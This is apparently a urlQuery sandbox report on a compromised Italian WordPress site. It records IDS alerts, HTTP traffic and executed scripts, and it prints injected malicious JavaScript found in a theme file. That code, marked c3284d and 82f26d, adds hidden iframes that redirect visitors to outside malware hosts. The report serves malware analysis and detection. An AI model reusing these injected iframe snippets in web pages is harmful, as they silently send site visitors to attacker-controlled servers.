Overview

URLhttp://www.apistoia.com/?p=15
IP62.149.140.226
ASNAS31034 Aruba S.p.A.
Location Italy
Report completed2012-10-26 03:52:57 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-10-26 03:52:23 62.149.140.226 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-10-26 03:52:23 62.149.140.226 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-10-26 03:52:23 62.149.140.226 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-10-26 03:52:23 62.149.140.226 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-10-26 03:52:23 62.149.140.226 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-10-26 03:52:23 62.149.140.226 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-10-26 03:52:23 62.149.140.226 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-10-26 03:52:23 62.149.140.226 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-10-26 03:52:24 62.149.140.226 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-10-26 03:52:25 74.53.143.237 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 62.149.140.226

Date Alerts / IDS URL IP
2013-02-16 12:42:070 / 0http://www.cartuccia-compatibile.com/62.149.140.226
2013-01-15 08:35:260 / 2http://www.studiodentisticoenricapoggio.it/media/system/js/mootools.js62.149.140.226
2013-01-02 08:17:172 / 6http://www.prezzivantaggiosi.it/62.149.140.226
2012-12-31 01:30:492 / 27http://www.prezzivantaggiosi.it/62.149.140.226
2012-12-29 16:43:451 / 1http://www.prezzivantaggiosi.it/index.php?option=com_content62.149.140.226
2012-12-29 06:17:001 / 2http://www.prezzivantaggiosi.it/index.php?option=com_content62.149.140.226

Last 6 reports on ASN: AS31034 Aruba S.p.A.

Date Alerts / IDS URL IP
2013-02-18 00:29:270 / 4http://www.ioviaggiando.it/62.149.142.126
2013-02-17 23:15:011 / 1http://www.journalbooks.it/spip.php?rubrique1962.149.140.74
2013-02-17 23:06:550 / 0http://www.studio42comunicazione.it/chestoria/62.149.142.88
2013-02-17 22:55:330 / 0http://www.carpentieriarchitetti.it/eng/progetti.asp?id_autore=&id_tipologia=7&ordina=a (...)62.149.131.176
2013-02-17 22:45:541 / 3http://www.wolfred.it/wallpaper/62.149.130.204
2013-02-17 22:42:490 / 26http://www.capuani.it/page-329.htm62.149.142.19

Last 6 reports on domain: www.apistoia.com

Date Alerts / IDS URL IP
2012-11-09 06:34:271 / 10http://www.apistoia.com/?p=42262.149.140.226
2012-11-01 01:59:231 / 1http://www.apistoia.com/62.149.140.226
2012-10-31 13:27:521 / 1http://www.apistoia.com/?cat=62.149.140.226
2012-10-31 04:40:400 / 1http://www.apistoia.com/wp-content/themes/journalcrunch/js/custom.js62.149.140.226
2012-10-30 22:11:500 / 1http://www.apistoia.com/wp-content/themes/journalcrunch/js/jquery.nivo.slider.pack.js62.149.140.226
2012-10-30 19:46:020 / 1http://www.apistoia.com/wp-content/themes/journalcrunch/js/twittercb.js62.149.140.226



JavaScript

Executed Scripts (14)

#5 JavaScript::Script (size: 3182, repeated: 1) - Alert detect on script (Severity: 2)

function twitterCallback2(twitters) {
    var statusHTML = [];
    for (var i = 0; i < twitters.length; i++) {
        var username = twitters[i].user.screen_name;
        var status = twitters[i].text.replace(/((https?|s?ftp|ssh)\:\/\/[^"\s\<\>]*[^.,;'">\:\s\<\>\)\]\!])/g, function(url) {
            return '<a href="' + url + '">' + url + '</a>';
        }).replace(/\B@([_a-z0-9]+)/ig, function(reply) {
            return reply.charAt(0) + '<a href="http://twitter.com/' + reply.substring(1) + '">' + reply.substring(1) + '</a>';
        });
        statusHTML.push('<li><span>' + status + '</span> <a style="font-size:85%" href="http://twitter.com/' + username + '/statuses/' + twitters[i].id + '">' + relative_time(twitters[i].created_at) + '</a></li>');
    }
    document.getElementById('twitter_tooltip').innerHTML = statusHTML.join('');
}

function twitterCallback3(twitters) {
    var statusHTML = [];
    for (var i = 0; i < twitters.length; i++) {
        var username = twitters[i].user.screen_name;
        var status = twitters[i].text.replace(/((https?|s?ftp|ssh)\:\/\/[^"\s\<\>]*[^.,;'">\:\s\<\>\)\]\!])/g, function(url) {
            return '<a href="' + url + '">' + url + '</a>';
        }).replace(/\B@([_a-z0-9]+)/ig, function(reply) {
            return reply.charAt(0) + '<a href="http://twitter.com/' + reply.substring(1) + '">' + reply.substring(1) + '</a>';
        });
        statusHTML.push('<li><span>' + status + '</span> <a style="font-size:85%" href="http://twitter.com/' + username + '/statuses/' + twitters[i].id + '">' + relative_time(twitters[i].created_at) + '</a></li>');
    }
    document.getElementById('twitter_update_list').innerHTML = statusHTML.join('');
}


function relative_time(time_value) {
    var values = time_value.split(" ");
    time_value = values[1] + " " + values[2] + ", " + values[5] + " " + values[3];
    var parsed_date = Date.parse(time_value);
    var relative_to = (arguments.length > 1) ? arguments[1] : new Date();
    var delta = parseInt((relative_to.getTime() - parsed_date) / 1000);
    delta = delta + (relative_to.getTimezoneOffset() * 60);

    if (delta < 60) {
        return 'less than a minute ago';
    } else if (delta < 120) {
        return 'about a minute ago';
    } else if (delta < (60 * 60)) {
        return (parseInt(delta / 60)).toString() + ' minutes ago';
    } else if (delta < (120 * 60)) {
        return 'about an hour ago';
    } else if (delta < (24 * 60 * 60)) {
        return 'about ' + (parseInt(delta / 3600)).toString() + ' hours ago';
    } else if (delta < (48 * 60 * 60)) {
        return '1 day ago';
    } else {
        return (parseInt(delta / 86400)).toString() + ' days ago';
    }
} /*c3284d*/

function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "http://www.castelmorrone.net/elezioni_2001/b.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd; /*/c3284d*/


/*82f26d*/
document.write('<iframe src="http://www.grupporagni.it/dam/counter.php" border="0" width="0" height="0"></iframe>'); /*/82f26d*/

Executed Evals (1)

#1 JavaScript::Eval (size: 10331, repeated: 1)

(function($) {
    $.fn.nivoSlider = function(options) {
        var settings = $.extend({}, $.fn.nivoSlider.defaults, options);
        return this.each(function() {
            var vars = {
                currentSlide: 0,
                currentImage: '',
                totalSlides: 0,
                randAnim: '',
                running: false,
                paused: false,
                stop: false
            };
            var slider = $(this);
            slider.data('nivo:vars', vars);
            slider.css('position', 'relative');
            slider.addClass('nivoSlider');
            var kids = slider.children();
            kids.each(function() {
                var child = $(this);
                var link = '';
                if (!child.is('img')) {
                    if (child.is('a')) {
                        child.addClass('nivo-imageLink');
                        link = child
                    }
                    child = child.find('img:first')
                }
                var childWidth = child.width();
                if (childWidth == 0) childWidth = child.attr('width');
                var childHeight = child.height();
                if (childHeight == 0) childHeight = child.attr('height');
                if (childWidth > slider.width()) {
                    slider.width(childWidth)
                }
                if (childHeight > slider.height()) {
                    slider.height(childHeight)
                }
                if (link != '') {
                    link.css('display', 'none')
                }
                child.css('display', 'none');
                vars.totalSlides++
            });
            if (settings.startSlide > 0) {
                if (settings.startSlide >= vars.totalSlides) settings.startSlide = vars.totalSlides - 1;
                vars.currentSlide = settings.startSlide
            }
            if ($(kids[vars.currentSlide]).is('img')) {
                vars.currentImage = $(kids[vars.currentSlide])
            } else {
                vars.currentImage = $(kids[vars.currentSlide]).find('img:first')
            }
            if ($(kids[vars.currentSlide]).is('a')) {
                $(kids[vars.currentSlide]).css('display', 'block')
            }
            slider.css('background', 'url(' + vars.currentImage.attr('src') + ') no-repeat');
            for (var i = 0; i < settings.slices; i++) {
                var sliceWidth = Math.round(slider.width() / settings.slices);
                if (i == settings.slices - 1) {
                    slider.append($('<div class="nivo-slice"></div>').css({
                        left: (sliceWidth * i) + 'px',
                        width: (slider.width() - (sliceWidth * i)) + 'px'
                    }))
                } else {
                    slider.append($('<div class="nivo-slice"></div>').css({
                        left: (sliceWidth * i) + 'px',
                        width: sliceWidth + 'px'
                    }))
                }
            }
            slider.append($('<div class="nivo-caption"><p></p></div>').css({
                display: 'none',
                opacity: settings.captionOpacity
            }));
            if (vars.currentImage.attr('title') != '') {
                $('.nivo-caption p', slider).html(vars.currentImage.attr('title'));
                $('.nivo-caption', slider).fadeIn(settings.animSpeed)
            }
            var timer = 0;
            if (!settings.manualAdvance && kids.length > 1) {
                timer = setInterval(function() {
                    nivoRun(slider, kids, settings, false)
                }, settings.pauseTime)
            }
            if (settings.directionNav) {
                slider.append('<div class="nivo-directionNav"><a class="nivo-prevNav">Prev</a><a class="nivo-nextNav">Next</a></div>');
                if (settings.directionNavHide) {
                    $('.nivo-directionNav', slider).hide();
                    slider.hover(function() {
                        $('.nivo-directionNav', slider).show()
                    }, function() {
                        $('.nivo-directionNav', slider).hide()
                    })
                }
                $('a.nivo-prevNav', slider).live('click', function() {
                    if (vars.running) return false;
                    clearInterval(timer);
                    timer = '';
                    vars.currentSlide -= 2;
                    nivoRun(slider, kids, settings, 'prev')
                });
                $('a.nivo-nextNav', slider).live('click', function() {
                    if (vars.running) return false;
                    clearInterval(timer);
                    timer = '';
                    nivoRun(slider, kids, settings, 'next')
                })
            }
            if (settings.controlNav) {
                var nivoControl = $('<div class="nivo-controlNav"></div>');
                slider.append(nivoControl);
                for (var i = 0; i < kids.length; i++) {
                    if (settings.controlNavThumbs) {
                        var child = kids.eq(i);
                        if (!child.is('img')) {
                            child = child.find('img:first')
                        }
                        if (settings.controlNavThumbsFromRel) {
                            nivoControl.append('<a class="nivo-control" rel="' + i + '"><img src="' + child.attr('rel') + '" alt="" /></a>')
                        } else {
                            nivoControl.append('<a class="nivo-control" rel="' + i + '"><img src="' + child.attr('src').replace(settings.controlNavThumbsSearch, settings.controlNavThumbsReplace) + '" alt="" /></a>')
                        }
                    } else {
                        nivoControl.append('<a class="nivo-control" rel="' + i + '">' + i + '</a>')
                    }
                }
                $('.nivo-controlNav a:eq(' + vars.currentSlide + ')', slider).addClass('active');
                $('.nivo-controlNav a', slider).live('click', function() {
                    if (vars.running) return false;
                    if ($(this).hasClass('active')) return false;
                    clearInterval(timer);
                    timer = '';
                    slider.css('background', 'url(' + vars.currentImage.attr('src') + ') no-repeat');
                    vars.currentSlide = $(this).attr('rel') - 1;
                    nivoRun(slider, kids, settings, 'control')
                })
            }
            if (settings.keyboardNav) {
                $(window).keypress(function(event) {
                    if (event.keyCode == '37') {
                        if (vars.running) return false;
                        clearInterval(timer);
                        timer = '';
                        vars.currentSlide -= 2;
                        nivoRun(slider, kids, settings, 'prev')
                    }
                    if (event.keyCode == '39') {
                        if (vars.running) return false;
                        clearInterval(timer);
                        timer = '';
                        nivoRun(slider, kids, settings, 'next')
                    }
                })
            }
            if (settings.pauseOnHover) {
                slider.hover(function() {
                    vars.paused = true;
                    clearInterval(timer);
                    timer = ''
                }, function() {
                    vars.paused = false;
                    if (timer == '' && !settings.manualAdvance) {
                        timer = setInterval(function() {
                            nivoRun(slider, kids, settings, false)
                        }, settings.pauseTime)
                    }
                })
            }
            slider.bind('nivo:animFinished', function() {
                vars.running = false;
                $(kids).each(function() {
                    if ($(this).is('a')) {
                        $(this).css('display', 'none')
                    }
                });
                if ($(kids[vars.currentSlide]).is('a')) {
                    $(kids[vars.currentSlide]).css('display', 'block')
                }
                if (timer == '' && !vars.paused && !settings.manualAdvance) {
                    timer = setInterval(function() {
                        nivoRun(slider, kids, settings, false)
                    }, settings.pauseTime)
                }
                settings.afterChange.call(this)
            })
        });

        function nivoRun(slider, kids, settings, nudge) {
            var vars = slider.data('nivo:vars');
            if ((!vars || vars.stop) && !nudge) return false;
            settings.beforeChange.call(this);
            if (!nudge) {
                slider.css('background', 'url(' + vars.currentImage.attr('src') + ') no-repeat')
            } else {
                if (nudge == 'prev') {
                    slider.css('background', 'url(' + vars.currentImage.attr('src') + ') no-repeat')
                }
                if (nudge == 'next') {
                    slider.css('background', 'url(' + vars.currentImage.attr('src') + ') no-repeat')
                }
            }
            vars.currentSlide++;
            if (vars.currentSlide == vars.totalSlides) {
                vars.currentSlide = 0;
                settings.slideshowEnd.call(this)
            }
            if (vars.currentSlide < 0) vars.currentSlide = (vars.totalSlides - 1);
            if ($(kids[vars.currentSlide]).is('img')) {
                vars.currentImage = $(kids[vars.currentSlide])
            } else {
                vars.currentImage = $(kids[vars.currentSlide]).find('img:first')
            }
            if (settings.controlNav) {
                $('.nivo-controlNav a', slider).removeClass('active');
                $('.nivo-controlNav a:eq(' + vars.currentSlide + ')', slider).addClass('active')
            }
            if (vars.currentImage.attr('title') != '') {
                if ($('.nivo-caption', slider).css('display') == 'block') {
                    $('.nivo-caption p', slider).fadeOut(settings.animSpeed, function() {
                        $(this).html(vars.currentImage.attr('title'));
                        $(this).fadeIn(settings.animSpeed)
                    })
                } else {
                    $('.nivo-caption p', slider).html(vars.currentImage.attr('title'))
                }
                $('.nivo-caption', slider).fadeIn(settings.animSpeed)
            } else {
                $('.nivo-caption', slider).fadeOut(settings.animSpeed)
            }
            var i = 0;
            $('.nivo-slice', slider).each(function() {
                var sliceWidth = Math.round(slider.width() / settings.slices);
                $(this).css({
                    height: '0px',
                    opacity: '0',
                    background: 'url(' + vars.currentImage.attr('src') + ') no-repeat -' + ((sliceWidth + (i * sliceWidth)) - sliceWidth) + 'px 0%'
                });
                i++
            });
            if (settings.effect == 'random') {
                var anims = new Array("sliceDownRight", "sliceDownLeft", "sliceUpRight", "sliceUpLeft", "sliceUpDown", "sliceUpDownLeft", "fold", "fade");
                vars.randAnim = anims[Math.floor(Math.random() * (anims.length + 1))];
                if (vars.randAnim == undefined) vars.randAnim = 'fade'
            }
            if (settings.effect.indexOf(',') != -1) {
                var anims = settings.effect.split(',');
                vars.randAnim = $.trim(anims[Math.floor(Math.random() * anims.length)])
            }
            vars.running = true;
            if (settings.effect == 'sliceDown' || settings.effect == 'sliceDownRight' || vars.randAnim == 'sliceDownRight' || settings.effect == 'sliceDownLeft' || vars.randAnim == 'sliceDownLeft') {
                var timeBuff = 0;
                var i = 0;
                var slices = $('.nivo-slice', slider);
                if (settings.effect == 'sliceDownLeft' || vars.randAnim == 'sliceDownLeft') slices = $('.nivo-slice', slider).reverse();
                slices.each(function() {
                    var slice = $(this);
                    slice.css('top', '0px');
                    if (i == settings.slices - 1) {
                        setTimeout(function() {
                            slice.animate({
                                height: '100%',
                                opacity: '1.0'
                            }, settings.animSpeed, '', function() {
                                slider.trigger('nivo:animFinished')
                            })
                        }, (100 + timeBuff))
                    } else {
                        setTimeout(function() {
                            slice.animate({
                                height: '100%',
                                opacity: '1.0'
                            }, settings.animSpeed)
                        }, (100 + timeBuff))
                    }
                    timeBuff += 50;
                    i++
                })
            } else if (settings.effect == 'sliceUp' || settings.effect == 'sliceUpRight' || vars.randAnim == 'sliceUpRight' || settings.effect == 'sliceUpLeft' || vars.randAnim == 'sliceUpLeft') {
                var timeBuff = 0;
                var i = 0;
                var slices = $('.nivo-slice', slider);
                if (settings.effect == 'sliceUpLeft' || vars.randAnim == 'sliceUpLeft') slices = $('.nivo-slice', slider).reverse();
                slices.each(function() {
                    var slice = $(this);
                    slice.css('bottom', '0px');
                    if (i == settings.slices - 1) {
                        setTimeout(function() {
                            slice.animate({
                                height: '100%',
                                opacity: '1.0'
                            }, settings.animSpeed, '', function() {
                                slider.trigger('nivo:animFinished')
                            })
                        }, (100 + timeBuff))
                    } else {
                        setTimeout(function() {
                            slice.animate({
                                height: '100%',
                                opacity: '1.0'
                            }, settings.animSpeed)
                        }, (100 + timeBuff))
                    }
                    timeBuff += 50;
                    i++
                })
            } else if (settings.effect == 'sliceUpDown' || settings.effect == 'sliceUpDownRight' || vars.randAnim == 'sliceUpDown' || settings.effect == 'sliceUpDownLeft' || vars.randAnim == 'sliceUpDownLeft') {
                var timeBuff = 0;
                var i = 0;
                var v = 0;
                var slices = $('.nivo-slice', slider);
                if (settings.effect == 'sliceUpDownLeft' || vars.randAnim == 'sliceUpDownLeft') slices = $('.nivo-slice', slider).reverse();
                slices.each(function() {
                    var slice = $(this);
                    if (i == 0) {
                        slice.css('top', '0px');
                        i++
                    } else {
                        slice.css('bottom', '0px');
                        i = 0
                    }
                    if (v == settings.slices - 1) {
                        setTimeout(function() {
                            slice.animate({
                                height: '100%',
                                opacity: '1.0'
                            }, settings.animSpeed, '', function() {
                                slider.trigger('nivo:animFinished')
                            })
                        }, (100 + timeBuff))
                    } else {
                        setTimeout(function() {
                            slice.animate({
                                height: '100%',
                                opacity: '1.0'
                            }, settings.animSpeed)
                        }, (100 + timeBuff))
                    }
                    timeBuff += 50;
                    v++
                })
            } else if (settings.effect == 'fold' || vars.randAnim == 'fold') {
                var timeBuff = 0;
                var i = 0;
                $('.nivo-slice', slider).each(function() {
                    var slice = $(this);
                    var origWidth = slice.width();
                    slice.css({
                        top: '0px',
                        height: '100%',
                        width: '0px'
                    });
                    if (i == settings.slices - 1) {
                        setTimeout(function() {
                            slice.animate({
                                width: origWidth,
                                opacity: '1.0'
                            }, settings.animSpeed, '', function() {
                                slider.trigger('nivo:animFinished')
                            })
                        }, (100 + timeBuff))
                    } else {
                        setTimeout(function() {
                            slice.animate({
                                width: origWidth,
                                opacity: '1.0'
                            }, settings.animSpeed)
                        }, (100 + timeBuff))
                    }
                    timeBuff += 50;
                    i++
                })
            } else if (settings.effect == 'fade' || vars.randAnim == 'fade') {
                var i = 0;
                $('.nivo-slice', slider).each(function() {
                    $(this).css('height', '100%');
                    if (i == settings.slices - 1) {
                        $(this).animate({
                            opacity: '1.0'
                        }, (settings.animSpeed * 2), '', function() {
                            slider.trigger('nivo:animFinished')
                        })
                    } else {
                        $(this).animate({
                            opacity: '1.0'
                        }, (settings.animSpeed * 2))
                    }
                    i++
                })
            }
        }
    };
    $.fn.nivoSlider.defaults = {
        effect: 'random',
        slices: 15,
        animSpeed: 500,
        pauseTime: 3000,
        startSlide: 0,
        directionNav: true,
        directionNavHide: true,
        controlNav: true,
        controlNavThumbs: false,
        controlNavThumbsFromRel: false,
        controlNavThumbsSearch: '.jpg',
        controlNavThumbsReplace: '_thumb.jpg',
        keyboardNav: true,
        pauseOnHover: true,
        manualAdvance: false,
        captionOpacity: 0.8,
        beforeChange: function() {},
        afterChange: function() {},
        slideshowEnd: function() {}
    };
    $.fn.reverse = [].reverse
})(jQuery);

Executed Writes (1)

#1 JavaScript::Write (size: 97, repeated: 9)

<iframe src="http://www.grupporagni.it/dam/counter.php" border="0" width="0" height="0"></iframe>


HTTP Transactions (70)


Request Response
GET /dam/counter.php HTTP/1.1

Host: www.grupporagni.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Location: http://moreclosings.com/showthread.php?sid=174143
Content-Length: 233
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /?p=15 HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
X-Pingback: http://www.apistoia.com/xmlrpc.php
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /wp-content/themes/journalcrunch/css/nivo-slider.css HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: text/css
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:19 GMT
Etag: &quot;40e5775-819-4bea526f033c0&quot;
Accept-Ranges: bytes
Content-Length: 2073
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/css/ddsmoothmenu.css HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: text/css
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:19 GMT
Etag: &quot;5f662fd-59a-4bea526f033c0&quot;
Accept-Ranges: bytes
Content-Length: 1434
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/js/twittercb.js HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Mon, 24 Sep 2012 00:41:32 GMT
Etag: &quot;40e5863-c6e-4ca67d9d68700&quot;
Accept-Ranges: bytes
Content-Length: 3182
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/js/jquery.form.js HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Mon, 24 Sep 2012 00:41:22 GMT
Etag: &quot;40e54e3-7ea1-4ca67d93df080&quot;
Accept-Ranges: bytes
Content-Length: 32417
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/style.css HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: text/css
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:17 GMT
Etag: &quot;40e5483-44c6-4bea526d1af40&quot;
Accept-Ranges: bytes
Content-Length: 17606
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/js/ddsmoothmenu.js HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Mon, 24 Sep 2012 00:41:37 GMT
Etag: &quot;5923471-1da0-4ca67da22d240&quot;
Accept-Ranges: bytes
Content-Length: 7584
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/css/prettyPhoto.css HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: text/css
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:19 GMT
Etag: &quot;10281a3-37ac-4bea526f033c0&quot;
Accept-Ranges: bytes
Content-Length: 14252
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/js/jquery.prettyPhoto.js HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Mon, 24 Sep 2012 00:41:42 GMT
Etag: &quot;40e37eb-4444-4ca67da6f1d80&quot;
Accept-Ranges: bytes
Content-Length: 17476
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/js/custom.js HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Mon, 24 Sep 2012 00:41:46 GMT
Etag: &quot;40e5831-91b-4ca67daac2680&quot;
Accept-Ranges: bytes
Content-Length: 2331
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/js/cufon-yui.js HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Mon, 24 Sep 2012 00:41:28 GMT
Etag: &quot;40e5838-4a15-4ca67d9997e00&quot;
Accept-Ranges: bytes
Content-Length: 18965
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/js/jquery.nivo.slider.pack.js HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Mon, 24 Sep 2012 00:41:51 GMT
